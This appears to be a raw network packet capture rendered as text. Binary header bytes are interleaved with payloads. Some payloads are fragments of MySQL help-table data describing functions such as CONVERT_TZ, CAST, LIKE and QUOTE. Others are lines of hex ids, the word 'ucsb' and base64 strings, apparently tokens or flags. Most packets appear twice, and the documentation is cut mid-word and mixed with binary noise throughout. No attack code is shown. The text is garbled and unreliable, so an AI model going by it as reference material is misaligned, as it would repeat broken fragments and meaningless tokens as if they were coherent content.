78CA19541126F98E0386BDE1783F0A4D,ucsb,MTNzEwEDAnNUH9UQfDPMf5t6WwQwLt35YMAlKA==
1BA0CDB48461D8F6192EF530B351C296,ucsb,MTNzEwEDAnQ8t6g4LyFIlR5EhUbzf6ogSLIgUA==
DB722ACA36282EB5F44392C22BF2CF1C,ucsb,MTNzEwEDAnVT+xzT5DhpDoukCVqml6JC0ALkug==
46417BDCͺ bbBi0`ET@/p܂Ao0E<*@?LM  3PWtڀ  g)6subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with RELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones mCԺ ZZBi0`EL@/܂Sŀo0E4L@?3 3 Pu't1 )EC bb0`BiET@/Ԁo0SE<*@@KM  3PWtڀ  g)6subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was obtained with\nGET_LOCK(). Returns 1 if the lock was released, 0 if the\nlock wasn\'t locked by this thread (in which case the lock is not released),\nand NULL if the named lock didn\'t exist. The lock does not exist if\nit was never obtained by a call to GET_LOCK() or if it has previously\nbeen released.\n\nThe DO statement is convenient to use with RELEASE_LOCK().\nSee also : [DO, , DO].\n','',''),(293,'IS NULL',26,' IS NULL\n IS NOT NULL\nTests whether a value is or is not NULL.\n','mysql> SELECT 1 IS NULL, 0 IS NULL, NULL IS NULL;\n -> 0, 0, 1\nmysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0',''),(294,'CONVERT_TZ',14,' CONVERT_TZ(dt,from_tz,to_tz)\n\nCONVERT_TZ()\nconverts a datetime value dt from time zone given by from_tz\nto the time zone given by to_tz and returns the resulting value.\nTime zones mC ZZ0`BiEL@/go0AE4L@@3 3 Pu't1 )EC bbBi0`ET@/p܂Ao0E<+@?LL  3PW!tڀ f j)7ay be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORC¿ bb0`BiET@/Ԁo0SE<+@@KL  3PW!tڀ f j)7ay be specified as described in [Time zone support].\nThis function returns NULL if the arguments are invalid.\n','mysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'GMT\',\'MET\');\n -> \'2004-01-01 13:00:00\'\nmysql> SELECT CONVERT_TZ(\'2004-01-01 12:00:00\',\'+00:00\',\'-07:00\');\n -> \'2004-01-01 05:00:00\'',''),(295,'TIME_TO_SEC',14,' TIME_TO_SEC(time)\nReturns the time argument, converted to seconds.\n','mysql> SELECT TIME_TO_SEC(\'22:23:00\');\n -> 80580\nmysql> SELECT TIME_TO_SEC(\'00:39:38\');\n -> 2378',''),(296,'WEEKDAY',14,' WEEKDAY(date)\nReturns the weekday index for\ndate (0 = Monday, 1 = Tuesday, ... 6 = Sunday).\n','mysql> SELECT WEEKDAY(\'1998-02-03 22:23:00\');\n -> 1\nmysql> SELECT WEEKDAY(\'1997-11-05\');\n -> 2',''),(297,'EXPORT_SET',23,' EXPORT_SET(bits,on,off[,separator[,number_of_bits]])\nReturns a string in which for every bit set in the value bits, you\nget an on string and for every reset bit you get an off\nstring. Bits in bits are examined from right to left (from low-order\nto high-order bits). Strings are added to the result from left to right,\nseparated by the separator string (default \',\'). The number of\nbits examined is given by number_of_bits (default 64).\n','mysql> SELECT EXPORC, ZZBi0`EL@/9do0E4@?y  P#vZA  ];Z7=wC@ ZZʪBiEL@/o0o0oE4@@y  P#vZA  ];Z7=wC ZZBiʪEL@/o0oo0E4JM@@b PZA#v 7=x`];ZC1 ZZ0`BiEL@/ o09dE4JM@@e  PZA#v  7=x`];ZC bbBi0`ET@/p܂Ao0E<,@?LK  3PW)tڀ  j)7T_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names.C% bb0`BiET@/Ԁo0SE<,@@KK  3PW)tڀ  j)7T_SET(5,\'Y\',\'N\',\',\',4);\n -> \'Y,N,Y,N\'\nmysql> SELECT EXPORT_SET(6,\'1\',\'0\',\',\',10);\n -> \'0,1,1,0,0,0,0,0,0,0\'',''),(298,'TIME FUNCTION',14,' TIME(expr)\n\nExtracts the time part of the time or datetime expression expr.\n','mysql> SELECT TIME(\'2003-12-31 01:02:03\');\n -> \'01:02:03\'\nmysql> SELECT TIME(\'2003-12-31 01:02:03.000123\');\n -> \'01:02:03.000123\'',''),(299,'CAST',23,'The CAST() and CONVERT() functions can be used to take a\nvalue of one type and produce a value of another type.\n\nThe type can be one of the following values:\n\n --- BINARY\n --- CHAR\n --- DATE\n --- DATETIME\n --- SIGNED [INTEGER]\n --- TIME\n --- UNSIGNED [INTEGER]\n\nBINARY produces a binary string. See the entry for the BINARY\noperator in this section for a description of how this affects comparisons.\n\nCAST() and CONVERT() are available as of MySQL 4.0.2.\nThe CHAR conversion type is available as of 4.0.6.\nThe USING form of CONVERT() is available as of 4.1.0.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax.\nThe non-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING is used to convert data between different\ncharacter sets. In MySQL, transcoding names are the same as the\ncorresponding character set names.C ZZBi0`EL@/܂Sŀo0E4N@?1 3 P.'t )FC ffBi0`EX@/ЂSŀo0E@P@?# 3 P.'t )F ք6քC! ZZ0`BiEL@/go0AE4N@@1 3 P.'t )FC, ff0`BiEX@/g؀o0AE@P@@# 3 P.'t )F ք6քCw ZZBi0`EL@/܂Sŀo0E4R@?- 3 Pք't )FC ZZ0`BiEL@/go0AE4R@@- 3 Pք't )FC bbBi0`ET@/p܂Ao0E<-@?LJ  3PW1tڀ U l)8 For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n','mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % MaC ZZBi0`EL@/܂Sŀo0E4T@?+ 3 P։'t )FÌC bb0`BiET@/Ԁo0SE<-@@KJ  3PW1tڀ U l)8 For example, this statement converts\nthe string \'abc\' in the server\'s default character set to the\ncorresponding string in the utf8 character set:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\n \n\nThe cast functions are useful when you want to create a column with\na specific type in a CREATE ... SELECT statement:\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);',''),(300,'SOUNDS LIKE',23,' expr1 SOUNDS LIKE expr2\n\nThis is the same as SOUNDEX(expr1) = SOUNDEX(expr2). It is\navailable only in MySQL 4.1 or later.\n','',''),(301,'PERIOD_DIFF',14,' PERIOD_DIFF(P1,P2)\nReturns the number of months between periods P1 and P2.\nP1 and P2 should be in the format YYMM or YYYYMM.\nNote that the period arguments P1 and P2 are /not/\ndate values.\n','mysql> SELECT PERIOD_DIFF(9802,199703);\n -> 11',''),(302,'LIKE',23,' expr LIKE pat [ESCAPE \'escape-char\']\nPattern matching using\nSQL simple regular expression comparison. Returns 1 (TRUE) or 0\n(FALSE). If either expr or pat is NULL, the result is\nNULL.\n\nThe pattern need not be a literal string. For example, it can be specified\nas a string expression or table column.\n\nWith LIKE you can use the following two wildcard characters\nin the pattern:\n\n Character Description\n % MaC ZZ0`BiEL@/go0AE4T@@+ 3 P։'t )FÌC: bbBi0`ET@/,|po0E< +@?  P23J? č \dK00932D7398A9C52D5659D19BC,ucsb,MTNzEwEDAnb0bJGZxXT4GAHAytFXJMWxSuau1w==
6BB45203EDCB09C5E0167950086CEABF,ucsb,MTNzEwEDAnfWPaLWck+X5CM38qauXVfEbJ9uqQ==
148D4606AA381796A03E769FCD7FD33A,ucsb,MTNzEwEDAnhu9WqNxTfXwiP96GUra3mUGuy3RA==
AE6BA524C6589F61610676F62C35C036,ucsb,MTNzEwEDAnmgYIk4M3Y1UsPhR67LgM7Ee4b4KA==
29C5E2FDE799465B51BFCD4DDD71491C,ucsb,MTNzEwEDAnrUhhFfJRVRmd63XUeSVFEPr2ccYg==
5D836D4FC9185A59E11A84B91776DADA,ucsb,MTNzEwEDAnvFEVS1UTTx8EUkIpTrAikkEpHG0Q==
922507F7DB20E7D466AC7F6AEE0AD6B2,ucsb,MTNzEwEDAnxo129cJFL9Jw3+WbFbRsuVH6pNuA==
49B63BB4172ABDBBF2FB755E6C1EDD6C,ucsb,MTNzEwEDAn2H8fPRMMEeDZHrwSarTu+rQEDO5A==
C16C3A3CCC27A97054FE4C8F9911F425,ucsb,MTNzEwEDAn4qwfdSEu5zZMA5rtXsJCdYfUrFEQ==
98BAA61AC1AC3DD08E944D62530F5419,ucsb,MTNzEwEDAn+bWQoT8NDgu2BI10C1jOWhNIeV2g==
641764B98A1C9B722A3997B061275905,ucsb,MTNzEwEDAoBtrjRUtY0tlEfbZzwXM/mLT4oSLg==
94B75A31F836C089F2352295AFEA35D3,ucsb,MTNzEwEDAoGdAiqimRuT64pcTFEssS4l2bPd4Q==
EA9945FD0D95EB7ACCB92A8CADD6696D,ucsb,MTNzEwEDAoJ7TKFVGid3LZ0VEE1fXr0wDRbjvQ==
A7FE8EDC2CA3349E1BCEC7B5C0B40FCE,ucsb,MTNzEwEDAoNQrUc+ZvJQ83pK5CWtDKmUMGshlQ==
B95B64DCE6B1D2543C2A1316F29CDB0E,ucsb,MTNzEwEDAoQ99ajLE9dV54/NQCRBYRgul7j/8g==
5747748CD31186B79A0D6F3735A76CCA,ucsb,MTNzEwEDAoUsCV bb0`BiET@/o0AE< +@@  P23J? č \dK00932D7398A9C52D5659D19BC,ucsb,MTNzEwEDAnb0bJGZxXT4GAHAytFXJMWxSuau1w==
6BB45203EDCB09C5E0167950086CEABF,ucsb,MTNzEwEDAnfWPaLWck+X5CM38qauXVfEbJ9uqQ==
148D4606AA381796A03E769FCD7FD33A,ucsb,MTNzEwEDAnhu9WqNxTfXwiP96GUra3mUGuy3RA==
AE6BA524C6589F61610676F62C35C036,ucsb,MTNzEwEDAnmgYIk4M3Y1UsPhR67LgM7Ee4b4KA==
29C5E2FDE799465B51BFCD4DDD71491C,ucsb,MTNzEwEDAnrUhhFfJRVRmd63XUeSVFEPr2ccYg==
5D836D4FC9185A59E11A84B91776DADA,ucsb,MTNzEwEDAnvFEVS1UTTx8EUkIpTrAikkEpHG0Q==
922507F7DB20E7D466AC7F6AEE0AD6B2,ucsb,MTNzEwEDAnxo129cJFL9Jw3+WbFbRsuVH6pNuA==
49B63BB4172ABDBBF2FB755E6C1EDD6C,ucsb,MTNzEwEDAn2H8fPRMMEeDZHrwSarTu+rQEDO5A==
C16C3A3CCC27A97054FE4C8F9911F425,ucsb,MTNzEwEDAn4qwfdSEu5zZMA5rtXsJCdYfUrFEQ==
98BAA61AC1AC3DD08E944D62530F5419,ucsb,MTNzEwEDAn+bWQoT8NDgu2BI10C1jOWhNIeV2g==
641764B98A1C9B722A3997B061275905,ucsb,MTNzEwEDAoBtrjRUtY0tlEfbZzwXM/mLT4oSLg==
94B75A31F836C089F2352295AFEA35D3,ucsb,MTNzEwEDAoGdAiqimRuT64pcTFEssS4l2bPd4Q==
EA9945FD0D95EB7ACCB92A8CADD6696D,ucsb,MTNzEwEDAoJ7TKFVGid3LZ0VEE1fXr0wDRbjvQ==
A7FE8EDC2CA3349E1BCEC7B5C0B40FCE,ucsb,MTNzEwEDAoNQrUc+ZvJQ83pK5CWtDKmUMGshlQ==
B95B64DCE6B1D2543C2A1316F29CDB0E,ucsb,MTNzEwEDAoQ99ajLE9dV54/NQCRBYRgul7j/8g==
5747748CD31186B79A0D6F3735A76CCA,ucsb,MTNzEwEDAoUsCc bbBi0`ET@/,|po0E< ,@?  P28R? V ]dKu4G2WOxZymEej5DUEFYrcNpkzA==
339704764268304C50E9B00048ED55EC,ucsb,MTNzEwEDAoYhaJYtyZA0pyWRwouo5lPGT/uNsw==
2F64A3359F408F385FC9655084E78605,ucsb,MTNzEwEDAodXecBTk+AKKpg0yAP3mqWjVuPXBQ==
3B1627A38E762142E6AADAA95A160E41,ucsb,MTNzEwEDAohiUD1fYfZnpnNaoR9R0RjiAvdDyA==
1E123959F1111360634F1764BE068F3F,ucsb,MTNzEwEDAolDYlUKNd46cpvbiwBzxz1bwaq1Nw==
7DAD3D972588C55E253F36CD055C448E,ucsb,MTNzEwEDAoo482CZ9lU8xvTV2rMZKbZUPlGtrw==
2187C6B257687DD64205875219628ACA,ucsb,MTNzEwEDAosYDtzppJM9P24jzSK7nV/sxQbDnA==
8F42319C4E957CDFF9C0303FB3244C81,ucsb,MTNzEwEDAoxB+C+6Y+qDS05/j6INk7TflOmWJQ==
822D561E2B3D59C6F528272BAFD8245E,ucsb,MTNzEwEDAo0VtYE1me3EWoRNSY/qSfh648ISnA==
C2F8C6242AC353018A931F12738A1A66,ucsb,MTNzEwEDAo5M1b5f3nGUnriYeccMzi43k48ISw==
CE371F7C7210C710523475A4C2A48EFB,ucsb,MTNzEwEDAo+Xs1fOZ+4pUUv+iawKgn5LdoN81A==
03FFB2CBA8F6C5CADC631891A552E419,ucsb,MTNzEwEDApBW/YuBcYfAi7LefzsELxZnFv7wXw==
2812CDD7E71E7991538C82FE7F1A8974,ucsb,MTNzEwEDApF+Bvfs0/rnaLSAS2rFbKKCQMZeTQ==
5D68B903B1EEF39FD7AF2FFD5CB4B7D0,ucsb,MTNzEwEDApIuRHKJ93I6x0MiwnD6cvGBoCb7BQ==
4994A1484644A8270CB9489EA3F414A1,ucsb,MTNzEwEDApN2irxnKjnkN/P2exUckeL29DnnMw==
1A5FCD7F5A3D018DD67A1732101C8C6C,ucsb,MTNzEwEDApSu/j7mYVWmoD36bdaeErpP6Ivs8A==
F9A5CE8351C{ bb0`BiET@/o0AE< ,@@  P28R? V ]dKu4G2WOxZymEej5DUEFYrcNpkzA==
339704764268304C50E9B00048ED55EC,ucsb,MTNzEwEDAoYhaJYtyZA0pyWRwouo5lPGT/uNsw==
2F64A3359F408F385FC9655084E78605,ucsb,MTNzEwEDAodXecBTk+AKKpg0yAP3mqWjVuPXBQ==
3B1627A38E762142E6AADAA95A160E41,ucsb,MTNzEwEDAohiUD1fYfZnpnNaoR9R0RjiAvdDyA==
1E123959F1111360634F1764BE068F3F,ucsb,MTNzEwEDAolDYlUKNd46cpvbiwBzxz1bwaq1Nw==
7DAD3D972588C55E253F36CD055C448E,ucsb,MTNzEwEDAoo482CZ9lU8xvTV2rMZKbZUPlGtrw==
2187C6B257687DD64205875219628ACA,ucsb,MTNzEwEDAosYDtzppJM9P24jzSK7nV/sxQbDnA==
8F42319C4E957CDFF9C0303FB3244C81,ucsb,MTNzEwEDAoxB+C+6Y+qDS05/j6INk7TflOmWJQ==
822D561E2B3D59C6F528272BAFD8245E,ucsb,MTNzEwEDAo0VtYE1me3EWoRNSY/qSfh648ISnA==
C2F8C6242AC353018A931F12738A1A66,ucsb,MTNzEwEDAo5M1b5f3nGUnriYeccMzi43k48ISw==
CE371F7C7210C710523475A4C2A48EFB,ucsb,MTNzEwEDAo+Xs1fOZ+4pUUv+iawKgn5LdoN81A==
03FFB2CBA8F6C5CADC631891A552E419,ucsb,MTNzEwEDApBW/YuBcYfAi7LefzsELxZnFv7wXw==
2812CDD7E71E7991538C82FE7F1A8974,ucsb,MTNzEwEDApF+Bvfs0/rnaLSAS2rFbKKCQMZeTQ==
5D68B903B1EEF39FD7AF2FFD5CB4B7D0,ucsb,MTNzEwEDApIuRHKJ93I6x0MiwnD6cvGBoCb7BQ==
4994A1484644A8270CB9489EA3F414A1,ucsb,MTNzEwEDApN2irxnKjnkN/P2exUckeL29DnnMw==
1A5FCD7F5A3D018DD67A1732101C8C6C,ucsb,MTNzEwEDApSu/j7mYVWmoD36bdaeErpP6Ivs8A==
F9A5CE8351C3 bbBi0`ET@/p܂Ao0E<.@?LI  3PW9tڀ  l)8tches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+-C; ZZBi0`EL@/܂Sŀo0E4V@?) 3 P֎'t )GÌCK bb0`BiET@/Ԁo0SE<.@@KI  3PW9tڀ  l)8tches any number of characters, even zero characters\n _ Matches exactly one character\n \n','mysql> SELECT \'David!\' LIKE \'David_\';\n -> 1\nmysql> SELECT \'David!\' LIKE \'%D%v%\';\n -> 1',''),(303,'MULTIPOINT',2,' MultiPoint(pt1,pt2,...)\nConstructs a WKB MultiPoint value using WKB Point arguments.\nIf any argument is not a WKB Point, the return value is NULL.\n','',''),(304,'>>',27,' >>\nShifts a longlong (BIGINT) number to the right.\n','mysql> SELECT 4 >> 2;\n -> 1',''),(305,'TRUE FALSE',22,'TRUE and FALSE added as alias for 1 and 0, respectively.\n','',''),(306,'AVG',12,' AVG([DISTINCT] expr)\nReturns the average value of expr.\nThe DISTINCT option can be used as of MySQL 5.0.3 to return the averge\nof the distinct values of expr.\n','mysql> SELECT student_name, AVG(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(307,'MBRWITHIN',8,' MBRWithin(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle\nof g1 is within the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Polygon((0 0,0 5,5 5,5 0,0 0))\');\nmysql> SELECT MBRWithin(@g1,@g2), MBRWithin(@g2,@g1);\n+--------------------+-CV ZZ0`BiEL@/go0AE4V@@) 3 P֎'t )GÌC bbBi0`ET@/p܂Ao0E SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');C bb0`BiET@/Ԁo0SE SELECT 2 IN (0,3,5,\'wefwf\');\n -> 0\nmysql> SELECT \'wefwf\' IN (0,3,5,\'wefwf\');\n -> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');C' ZZBi0`EL@/܂Sŀo0E4X@?' 3 P֓'t )GÌC8 ZZ0`BiEL@/go0AE4X@@' 3 P֓'t )GÌC bbBi0`ET@/,|po0E< -@?  P2=Z? U  bdM5A9E8E2DE87276C3E14905,ucsb,MTNzEwEDApWGerK1lHUCa5ZHmIO88zlNpWTHqQ==
92D63D32DD083B4272F0DDD47477D206,ucsb,MTNzEwEDApauVy3KxV25kvHJcC+/mduedO/x2w==
C1D8A211E771B58A38ABC69C7933067A,ucsb,MTNzEwEDApfO6sRzp9Kx78sjMZsagrovHc7B1A==
9127A36F0B1B06355EE8F4DE714D0110,ucsb,MTNzEwEDAphL25eSonwsRMKxEt9E2mMQ+lfnGQ==
4808A42A8825AD1ABF9D9548D7012F9D,ucsb,MTNzEwEDApkE6jpB0q/KXvsz3LZRUqkuHQGocA==
2EE4A7638C636453DD4F2708447825FB,ucsb,MTNzEwEDAprqe8msRv/R/PcXYMiCUcnkE6kM5w==
621F32FA3461D73083466950EEBD7038,ucsb,MTNzEwEDApsZejDDtJM+66KjRfym1CwcLiB13A==
27119DE60889818A7B4B1C07BE02EB18,ucsb,MTNzEwEDApx+0cODKwybgAOhCjWRshA47xWhLQ==
23C6B1B71721ECE9086D657B8538C8CA,ucsb,MTNzEwEDAp18bVz4uD8K9yGuJ7+xD9hTj05GsA==
5E25E9FC1F22819210D826414AB7FDB0,ucsb,MTNzEwEDAp7jXDS1czNpnF5l7EAlwsnEoINcLw==
562A36B712FCA3F0A2CAAEBAD170391A,ucsb,MTNzEwEDAp+x/6PWgj5HETbJMRij36YIbarQ6A==
3C320748A04C0FCA0D99A1FD2071D3BE,ucsb,MTNzEwEDAqCLzxCI8p14QhJuJ0iXC3ImRBCu/g==
4922429E2A4AEAB03AF785F15EF6CB20,ucsb,MTNzEwEDAqEZelDYIHN4u0AJnmD98luSIMfsAw==
D7124794153E948A2C5E39F396106CDD,ucsb,MTNzEwEDAqKwzTdoC8j8pzOQ4KoHKW/bpebawA==
CE977DB2837E667E4A2EDF3D2E3F9125,ucsb,MTNzEwEDAqMfL7E+KRJINVJK9Fl8NR4zhN6M/g==
BA12140D57BD536AE72D013E36F9A903,ucsb,MTNzEwEDAqRO5eUC bb0`BiET@/o0AE< -@@  P2=Z? U  bdM5A9E8E2DE87276C3E14905,ucsb,MTNzEwEDApWGerK1lHUCa5ZHmIO88zlNpWTHqQ==
92D63D32DD083B4272F0DDD47477D206,ucsb,MTNzEwEDApauVy3KxV25kvHJcC+/mduedO/x2w==
C1D8A211E771B58A38ABC69C7933067A,ucsb,MTNzEwEDApfO6sRzp9Kx78sjMZsagrovHc7B1A==
9127A36F0B1B06355EE8F4DE714D0110,ucsb,MTNzEwEDAphL25eSonwsRMKxEt9E2mMQ+lfnGQ==
4808A42A8825AD1ABF9D9548D7012F9D,ucsb,MTNzEwEDApkE6jpB0q/KXvsz3LZRUqkuHQGocA==
2EE4A7638C636453DD4F2708447825FB,ucsb,MTNzEwEDAprqe8msRv/R/PcXYMiCUcnkE6kM5w==
621F32FA3461D73083466950EEBD7038,ucsb,MTNzEwEDApsZejDDtJM+66KjRfym1CwcLiB13A==
27119DE60889818A7B4B1C07BE02EB18,ucsb,MTNzEwEDApx+0cODKwybgAOhCjWRshA47xWhLQ==
23C6B1B71721ECE9086D657B8538C8CA,ucsb,MTNzEwEDAp18bVz4uD8K9yGuJ7+xD9hTj05GsA==
5E25E9FC1F22819210D826414AB7FDB0,ucsb,MTNzEwEDAp7jXDS1czNpnF5l7EAlwsnEoINcLw==
562A36B712FCA3F0A2CAAEBAD170391A,ucsb,MTNzEwEDAp+x/6PWgj5HETbJMRij36YIbarQ6A==
3C320748A04C0FCA0D99A1FD2071D3BE,ucsb,MTNzEwEDAqCLzxCI8p14QhJuJ0iXC3ImRBCu/g==
4922429E2A4AEAB03AF785F15EF6CB20,ucsb,MTNzEwEDAqEZelDYIHN4u0AJnmD98luSIMfsAw==
D7124794153E948A2C5E39F396106CDD,ucsb,MTNzEwEDAqKwzTdoC8j8pzOQ4KoHKW/bpebawA==
CE977DB2837E667E4A2EDF3D2E3F9125,ucsb,MTNzEwEDAqMfL7E+KRJINVJK9Fl8NR4zhN6M/g==
BA12140D57BD536AE72D013E36F9A903,ucsb,MTNzEwEDAqRO5eUC bbBi0`ET@/,|po0E< .@?  P2Bb? p bdMEeQ3vYdy/Uoz/0x3XgxdJEA==
2A657EB26111FA579A266ACE8941265C,ucsb,MTNzEwEDAqVC7sEVAuQ/g+Rcd5W8aQOeV0GV3g==
A8D7AA1C8DAE69A53A0E2CE62DDFEF02,ucsb,MTNzEwEDAqZOa0AqXEVyUVYwQrFpxASk6U14IQ==
3F618AA4022C57A0CB90C39BA7B927DB,ucsb,MTNzEwEDAqeaEpXlJBGxSlARCeFdsCKlUYe7WQ==
10B277AF48424324D3FDC83971FDEF41,ucsb,MTNzEwEDAqj6DcEOvObWtSJY4D4LQD70g2HQ2Q==
22610DFB049BFDC6A317D6AB37D9B8D7,ucsb,MTNzEwEDAqkk4KhfbWgHscoJzZ99LWWBZAubpg==
5F56203B6BDE1F15BB72D56B7035566D,ucsb,MTNzEwEDAqoPEGOHYM6HkVbD8F8xDKQdhe7Sdw==
